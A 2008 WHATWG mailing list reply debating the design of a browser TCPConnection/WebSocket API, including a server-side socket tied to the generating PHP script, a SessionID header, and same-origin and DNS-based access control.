[whatwg] TCPConnection feedback

Frode Børli frode at seria.no
Thu Jun 19 16:59:53 PDT 2008


>> I think we should have both a pure TCPSocket, and also a ServerSocket
>> that keeps the same connection as the original document was downloaded
>> from. The ServerSocket will make it very easy for web developers to
>> work with, since the ServerSocket object will be available both from
>> the server side and the client side while the page is being generated.
>> I am posting a separate proposal that describes my idea soon.
>
> I don't see the benefit of making sure that its the same connection that the
> page was "generated" from.

It does not have to be exactly the same connection, but I think it
should be handled by the web server because then there is no need to
think about transferring state information between for example a PHP
script and a WebSocketServer. It would be almost like creating a
desktop application. Simply because it would be easy for
webdevelopers: Sample PHP script:

There is probably a better approach to implementing this in php, but
its just a concept:
----
   <input id='test' type='button'>";
   <script type='text/javascript'>
      // when the button is clicked, raise the test_click event
handler on the server.
      document.getElementById('test').addEventListener('click',
document.serverSocket.createEventHandler('test_click');
      // when the server raises the "message" event, alert the message
      document.serverSocket.addEventListener('message', alert);
   </script>
<?php
// magic PHP method that is called whenever a client side event is
sent to the server
function __serverSocketEvent($name, $event)
{
    if($name == 'test_click')
       server_socket_event("message", "You clicked the button");
}
?>
 ----

>  If you establish a Connection: Keep-Alive with the proxy server, it will
> leave the connection open to you, but that doesn't mean that it will leave
> the connection open to the back end server as the Connection header is a
> single-hop header.

So it is not possible at all? There are no mechanisms in HTTP and
proxy servers that facilitates keeping the connection alive all the
way trough to the web server?


If a Session ID (or perhaps a Request ID) is added to the headers then
it is possible to create server side logic that makes it easier for
web developers. When session ids are sent trough cookies, web servers
and proxy servers have no way to identiy a session (since only the
script knows which cookie is the session id). The SessionID header
could be used by load balancers and more - and it could also be used
by for example IIS/Apache to connect a secondary socket to the script
that created the page (and ultimately achieving what I want).

>> The script on the server decides if the connection should be closed or
>> kept open. (Protection against DDOS attacks)
> With the proposed spec, the server can close the connection at any point.
I stated it as a benefit in the context of the web server handling the
requests. An image would close the connection immediately, but a
script could decide to keep it open. All servers can ofcourse close
any connection any time.

>> This allows implementing server side listening to client side events,
>> and vice versa. If this works, then the XMLHttpRequest object could be
>> updated to allow two way communications in exactly the same way.
>
> The previously proposed protocol already allows the server side listening to
> client side events, and vice versa. Rather or not to put that in the
> XMLHttpRequest interface is another issue. I think making XHR bi-directional
> is a bad idea because its confusing. Better to use a brand new api, like
> WebSocket.

If the implementation works as I tried to examplify in the PHP script
above; a document.serverSocket object is available, then the xhr
object should also have a .serverSocket object.

document.serverSocket.addEventListener(...)
xhr.serverSocket.addEventListener(...)

I am sure this can be achieved regardless of the protocol.

>> Also, by adding a SessionID header sent from the client (instead of
>> storing session ids in cookies), the web server could transparently
>> rematch any client with its corresponding server side process in case
>> of disconnect.
> Isn't that what cookies are supposed to do?  Regardless, it sounds like an
> application-level concern that should be layered on top of the protocol.

One important advantage is that javascript.cookie can be used for
hijacking sessions by sending the cookie trough for example an
img-tag. If javascript can't access the SessionID then sessions cant
be hijacked through XSS attacks.

Also I think load balancers and web servers and other applications
that do not have intimate knowledge about the web application should
be able to pair WebSocket connections with the actual http request.
How else can load balancers be created if they have to load balance
both pages and websockets to the same webserver? The load balancer
does not know what part of the cookie identifies the session.

I am sure that some clever people will find other uses if the session
id and request id is available for each request made from a script.

>> The HTTP spec has these features already:
>>
>> 1: Header: Connection: Keep-Alive
>> 2: Status: HTTP 101 Switching Protocol
>>
>> No need to rewrite the HTTP spec at all probably.
> You can't use HTTP 101 Switching Protocols without a Connection: Upgrade
> header. I think you'll note that the proposal that started this thread uses
> just this combination.

The HTTP 101 Switching Protocols can be sent by the server, without
the client asking for a protocol change. The only requirement is that
the server sends 426 Upgrade Required first, then specifies which
protocol to switch to. The protocol switched to could possibly be the
one proposed in the beginning of this thread.

The new protocol should be based on this:
http://tools.ietf.org/id/draft-burdis-http-sasl-00.txt

It is essentially the same, except we are upgrading to a two way
protocol, instead of an HTTPS protocol.

>> TCPConnections are only allowed to the server where the script was
>> downloaded from (same as Flash and Java applets). A DNS TXT record can
>> create a white list of servers whose scripts can connect. Also the
>> TCPConnection possibly should be allowed to connect to local network
>> resources, after a security warning - but only if the server has a
>> proper HTTPS certificate.
> How would a DNS TXT record solve the problem? I  could register evil.com and
> point it at an arbitrary ip address and claim that anyone who wants to can
> connect.

Doh, ofcourse! :) So I am going back to my first suggestion - the
server with the script must have a certificate as well. The script
must be signed with a private key, and the DNS server must have the
public key.

>> With the security measures I suggest above, there is no need for
>> protection against brute force attacks. Most developers only use one
>> server per site, and those that have multiple servers will certainly
>> be able to add a TXT-record to the DNS.
> I don't actually understand which part of the specification you want to
> change aside from doing the access control in a DNS TXT record instead of
> the protocol.

I care more about how it works for the developer than how the protocol
itself is implemented. I think maybe the protocol should be discussed
with others or have its own WG.

Summarizing what I want as a web developer:

The script that generates the page should be able to communicate with
the page it generated. The page should also be able to connect to a
separate script, if the web developer thinks that it is important.

Reasons:

1. Simplicity for developers.
2. No need to propagate state information between applications than
handles sockets and applications that generate the page.
3. It is more similar to a standard desktop application.
4. Resources opened by the script that created page, can be kept open
(file locking etc).



More information about the whatwg mailing list